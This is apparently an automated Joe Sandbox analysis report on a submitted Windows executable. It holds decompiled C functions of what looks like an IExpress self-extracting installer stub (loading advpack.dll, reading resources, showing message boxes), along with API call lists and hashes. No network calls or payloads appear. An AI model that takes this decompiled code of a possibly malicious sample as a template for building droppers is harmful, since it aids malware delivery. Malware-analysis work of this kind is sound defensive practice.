                                                                                                                                                                                                        0x00de3982
                                                                                                                                                                                                        0x00de398b
                                                                                                                                                                                                        0x00de398d
                                                                                                                                                                                                        0x00de398f
                                                                                                                                                                                                        0x00de399f
                                                                                                                                                                                                        0x00de39a1
                                                                                                                                                                                                        0x00de3991
                                                                                                                                                                                                        0x00de3991
                                                                                                                                                                                                        0x00de3991
                                                                                                                                                                                                        0x00de398f
                                                                                                                                                                                                        0x00de39af
                                                                                                                                                                                                        0x00de39b6
                                                                                                                                                                                                        0x00de3a0f
                                                                                                                                                                                                        0x00de3a0f
                                                                                                                                                                                                        0x00de3a11
                                                                                                                                                                                                        0x00de3a13
                                                                                                                                                                                                        0x00de3a19
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de39b8
                                                                                                                                                                                                        0x00de39b8
                                                                                                                                                                                                        0x00de39ba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de39bc
                                                                                                                                                                                                        0x00de39bf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de39c3
                                                                                                                                                                                                        0x00de39c9
                                                                                                                                                                                                        0x00de39ce
                                                                                                                                                                                                        0x00de39d0
                                                                                                                                                                                                        0x00de39e3
                                                                                                                                                                                                        0x00de39e5
                                                                                                                                                                                                        0x00de39e6
                                                                                                                                                                                                        0x00de39f1
                                                                                                                                                                                                        0x00de39f7
                                                                                                                                                                                                        0x00de39fa
                                                                                                                                                                                                        0x00de3a01
                                                                                                                                                                                                        0x00de3a04
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3a06
                                                                                                                                                                                                        0x00de3a09
                                                                                                                                                                                                        0x00de3a09
                                                                                                                                                                                                        0x00de3a0b
                                                                                                                                                                                                        0x00de3a0b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3a09
                                                                                                                                                                                                        0x00de39fc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de39fc
                                                                                                                                                                                                        0x00de39d3
                                                                                                                                                                                                        0x00de39d8
                                                                                                                                                                                                        0x00de39da
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de39dc
                                                                                                                                                                                                        0x00de39b6
                                                                                                                                                                                                        0x00de3955
                                                                                                                                                                                                        0x00de395b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3961
                                                                                                                                                                                                        0x00de3963
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3969
                                                                                                                                                                                                        0x00de3969
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3969
                                                                                                                                                                                                        0x00de3915
                                                                                                                                                                                                        0x00de3915
                                                                                                                                                                                                        0x00de391b
                                                                                                                                                                                                        0x00de391f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de392d
                                                                                                                                                                                                        0x00de3933
                                                                                                                                                                                                        0x00de3938
                                                                                                                                                                                                        0x00de393a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de3940
                                                                                                                                                                                                        0x00de3946
                                                                                                                                                                                                        0x00de394b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de394b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de38f2
                                                                                                                                                                                                        0x00de3843
                                                                                                                                                                                                        0x00de3845
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de384b
                                                                                                                                                                                                        0x00de384d
                                                                                                                                                                                                        0x00de3883
                                                                                                                                                                                                        0x00de3885
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de389a
                                                                                                                                                                                                        0x00de389e
                                                                                                                                                                                                        0x00de389e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de38a0
                                                                                                                                                                                                        0x00de38a0
                                                                                                                                                                                                        0x00de38a2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de38a4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de38a4
                                                                                                                                                                                                        0x00de384f
                                                                                                                                                                                                        0x00de3851
                                                                                                                                                                                                        0x00de3857

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00DE3723
                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 00DE39C3
                                                                                                                                                                                                        • MessageBoxA.USER32(00000000,00000000,cent,00000030), ref: 00DE39F1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Message$BeepVersion
                                                                                                                                                                                                        • String ID: 3$cent
                                                                                                                                                                                                        • API String ID: 2519184315-3438608206
                                                                                                                                                                                                        • Opcode ID: ca56890ad02df19033130afd04dab599bdec51708f9316d33e3dfbd14d03de78
                                                                                                                                                                                                        • Instruction ID: f2dbf715f7a12ad4b94d9ca12900919fa946169b11aaa6c3d5b8538b152c7bc5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ca56890ad02df19033130afd04dab599bdec51708f9316d33e3dfbd14d03de78
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5F91E1B1A012E49BDB35BB16CD887BAB7A1EB45304F1900A9D889DB241DB70CF80CF71
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                                                                                        			E00DE6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				signed char _t14;
                                                                                                                                                                                                        				struct HINSTANCE__* _t15;
                                                                                                                                                                                                        				void* _t18;
                                                                                                                                                                                                        				CHAR* _t26;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t27 = __esi;
                                                                                                                                                                                                        				_t18 = __ebx;
                                                                                                                                                                                                        				_t9 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				E00DE1781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                        				_t26 = "advpack.dll";
                                                                                                                                                                                                        				E00DE658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                        				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                        					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00DE6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                        			}














                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 00DE64DF
                                                                                                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 00DE64F9
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 00DE6502
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$advpack.dll
                                                                                                                                                                                                        • API String ID: 438848745-836797370
                                                                                                                                                                                                        • Opcode ID: fc68359a27ba0fddde1508478b427e952143527bd0a6c80d27549d4f9c67eed3
                                                                                                                                                                                                        • Instruction ID: b0090d1816eb87f0ebb3ae6a98db016dbcc923cc6bd08af507802395717b4bb5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: fc68359a27ba0fddde1508478b427e952143527bd0a6c80d27549d4f9c67eed3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5201D630A002889BD750FB66DC89AEE7778DB60311F500195F585962C4DF70EE898A71
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00DE28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				char* _v12;
                                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                        				int _v28;
                                                                                                                                                                                                        				int _v32;
                                                                                                                                                                                                        				void* _v36;
                                                                                                                                                                                                        				int _v40;
                                                                                                                                                                                                        				void* _v44;
                                                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                        				intOrPtr _v60;
                                                                                                                                                                                                        				intOrPtr _v64;
                                                                                                                                                                                                        				long _t68;
                                                                                                                                                                                                        				void* _t70;
                                                                                                                                                                                                        				void* _t73;
                                                                                                                                                                                                        				void* _t79;
                                                                                                                                                                                                        				void* _t83;
                                                                                                                                                                                                        				void* _t87;
                                                                                                                                                                                                        				void* _t88;
                                                                                                                                                                                                        				intOrPtr _t93;
                                                                                                                                                                                                        				intOrPtr _t97;
                                                                                                                                                                                                        				intOrPtr _t99;
                                                                                                                                                                                                        				int _t101;
                                                                                                                                                                                                        				void* _t103;
                                                                                                                                                                                                        				void* _t106;
                                                                                                                                                                                                        				void* _t109;
                                                                                                                                                                                                        				void* _t110;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_v12 = __edx;
                                                                                                                                                                                                        				_t99 = __ecx;
                                                                                                                                                                                                        				_t106 = 0;
                                                                                                                                                                                                        				_v16 = __ecx;
                                                                                                                                                                                                        				_t87 = 0;
                                                                                                                                                                                                        				_t103 = 0;
                                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                                        				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                        					L19:
                                                                                                                                                                                                        					_t106 = 1;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t62 = 0;
                                                                                                                                                                                                        					_v8 = 0;
                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                        						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                        						if(E00DE2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                        							goto L20;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                        						_v28 = _t68;
                                                                                                                                                                                                        						if(_t68 == 0) {
                                                                                                                                                                                                        							_t99 = _v16;
                                                                                                                                                                                                        							_t70 = _v8 + _t99;
                                                                                                                                                                                                        							_t93 = _v24;
                                                                                                                                                                                                        							_t87 = _v20;
                                                                                                                                                                                                        							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                        								goto L18;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                        							if(_t103 != 0) {
                                                                                                                                                                                                        								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                        								_v36 = _t73;
                                                                                                                                                                                                        								if(_t73 != 0) {
                                                                                                                                                                                                        									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                        										L15:
                                                                                                                                                                                                        										GlobalUnlock(_t103);
                                                                                                                                                                                                        										_t99 = _v16;
                                                                                                                                                                                                        										L18:
                                                                                                                                                                                                        										_t87 = _t87 + 1;
                                                                                                                                                                                                        										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                        										_v20 = _t87;
                                                                                                                                                                                                        										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                        										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                        											continue;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L19;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t79 = _v44;
                                                                                                                                                                                                        										_t88 = _t106;
                                                                                                                                                                                                        										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                        										_t101 = _v28;
                                                                                                                                                                                                        										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                        										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                        										_t97 = _v48;
                                                                                                                                                                                                        										_v36 = _t83;
                                                                                                                                                                                                        										_t109 = _t83;
                                                                                                                                                                                                        										do {
                                                                                                                                                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00DE2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00DE2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                        											_t109 = _t109 + 0x18;
                                                                                                                                                                                                        											_t88 = _t88 + 4;
                                                                                                                                                                                                        										} while (_t88 < 8);
                                                                                                                                                                                                        										_t87 = _v20;
                                                                                                                                                                                                        										_t106 = 0;
                                                                                                                                                                                                        										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                        											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                        												GlobalUnlock(_t103);
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												goto L15;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L15;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L20;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L20:
                                                                                                                                                                                                        				 *_a8 = _t87;
                                                                                                                                                                                                        				if(_t103 != 0) {
                                                                                                                                                                                                        					GlobalFree(_t103);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t106;
                                                                                                                                                                                                        			}


































                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GlobalFree.KERNEL32 ref: 00DE2A6F
                                                                                                                                                                                                          • Part of subcall function 00DE2773: CharUpperA.USER32(B4DD4FDF,00000000,00000000,00000000), ref: 00DE27A8
                                                                                                                                                                                                          • Part of subcall function 00DE2773: CharNextA.USER32(0000054D), ref: 00DE27B5
                                                                                                                                                                                                          • Part of subcall function 00DE2773: CharNextA.USER32(00000000), ref: 00DE27BC
                                                                                                                                                                                                          • Part of subcall function 00DE2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00DE2829
                                                                                                                                                                                                          • Part of subcall function 00DE2773: RegQueryValueExA.ADVAPI32(?,00DE1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00DE2852
                                                                                                                                                                                                          • Part of subcall function 00DE2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00DE2870
                                                                                                                                                                                                          • Part of subcall function 00DE2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00DE28A0
                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00DE3938,?,?,?,?,-00000005), ref: 00DE2958
                                                                                                                                                                                                        • GlobalLock.KERNEL32 ref: 00DE2969
                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00DE3938,?,?,?,?,-00000005,?), ref: 00DE2A21
                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00DE2A81
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3949799724-0
                                                                                                                                                                                                        • Opcode ID: 72eff0e43b1248814fd0902470ae9ccfd46e706371d7255e04bfacc07319acde
                                                                                                                                                                                                        • Instruction ID: 67fe3eeb5cd4b2557777255df3cbd11e3cd334809637ec350d81bc14c68f5e4b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 72eff0e43b1248814fd0902470ae9ccfd46e706371d7255e04bfacc07319acde
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A511931E00259DBCB25EF99C885ABEBBB9FF48700F14406AE905E7311D7319A41DBB4
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 32%
                                                                                                                                                                                                        			E00DE4169(void* __eflags) {
                                                                                                                                                                                                        				int _t18;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t20 = E00DE468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                        				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                        				if(_t21 != 0) {
                                                                                                                                                                                                        					if(E00DE468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                        						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                        							L7:
                                                                                                                                                                                                        							return LocalFree(_t21);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						_push(0x40);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						_push(_t21);
                                                                                                                                                                                                        						_t18 = 0x3e9;
                                                                                                                                                                                                        						L6:
                                                                                                                                                                                                        						E00DE44B9(0, _t18);
                                                                                                                                                                                                        						goto L7;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0x10);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_t18 = 0x4b1;
                                                                                                                                                                                                        					goto L6;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00DE44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        			}






                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DE46A0
                                                                                                                                                                                                          • Part of subcall function 00DE468F: SizeofResource.KERNEL32(00000000,00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46A9
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DE46C3
                                                                                                                                                                                                          • Part of subcall function 00DE468F: LoadResource.KERNEL32(00000000,00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46CC
                                                                                                                                                                                                          • Part of subcall function 00DE468F: LockResource.KERNEL32(00000000,?,00DE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46D3
                                                                                                                                                                                                          • Part of subcall function 00DE468F: memcpy_s.MSVCRT ref: 00DE46E5
                                                                                                                                                                                                          • Part of subcall function 00DE468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00DE46EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00DE30B4), ref: 00DE4189
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00DE30B4), ref: 00DE41E7
                                                                                                                                                                                                          • Part of subcall function 00DE44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00DE4518
                                                                                                                                                                                                          • Part of subcall function 00DE44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00DE4554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$FINISHMSG
                                                                                                                                                                                                        • API String ID: 3507850446-3091758298
                                                                                                                                                                                                        • Opcode ID: cf42bc250a4c2b89babe4fb0115353ee168301ec2179870781915e2f9d0f3ffa
                                                                                                                                                                                                        • Instruction ID: 2de399e690c8c0904e94124af77c3b1b3f240e21489306c4deab0dfea9a3b32d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: cf42bc250a4c2b89babe4fb0115353ee168301ec2179870781915e2f9d0f3ffa
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D01D1B57003953BF7243A6B8C86F7B218EDBD4799F044029B705E52C09EA8DC414175
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00DE19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v520;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t11;
                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                                        				struct HWND__* _t34;
                                                                                                                                                                                                        				signed int _t35;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t33 = __edi;
                                                                                                                                                                                                        				_t27 = __ebx;
                                                                                                                                                                                                        				_t11 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                        				_t34 = _a4;
                                                                                                                                                                                                        				_t14 = _a8 - 0x110;
                                                                                                                                                                                                        				if(_t14 == 0) {
                                                                                                                                                                                                        					_t32 = GetDesktopWindow();
                                                                                                                                                                                                        					E00DE43D0(_t34, _t15);
                                                                                                                                                                                                        					_v520 = 0;
                                                                                                                                                                                                        					LoadStringA( *0xde9a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                        					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                        					MessageBeep(0xffffffff);
                                                                                                                                                                                                        					goto L6;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					if(_t14 != 1) {
                                                                                                                                                                                                        						L4:
                                                                                                                                                                                                        						_t23 = 0;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t32 = _a12;
                                                                                                                                                                                                        						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							EndDialog(_t34, _t32);
                                                                                                                                                                                                        							L6:
                                                                                                                                                                                                        							_t23 = 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00DE6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                        			}














                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 00DE1A18
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00DE1A24
                                                                                                                                                                                                        • LoadStringA.USER32(?,?,00000200), ref: 00DE1A4F
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00DE1A62
                                                                                                                                                                                                        • MessageBeep.USER32(000000FF), ref: 00DE1A6A
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1273765764-0
                                                                                                                                                                                                        • Opcode ID: d339cfbbb397c40eec58dabe64057f389feca4f51ec6f797e4adde02de35b566
                                                                                                                                                                                                        • Instruction ID: 5c419e886796baf7ea5f9dbbd448de1f85dc95f6154a50b1fd593889423711a5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d339cfbbb397c40eec58dabe64057f389feca4f51ec6f797e4adde02de35b566
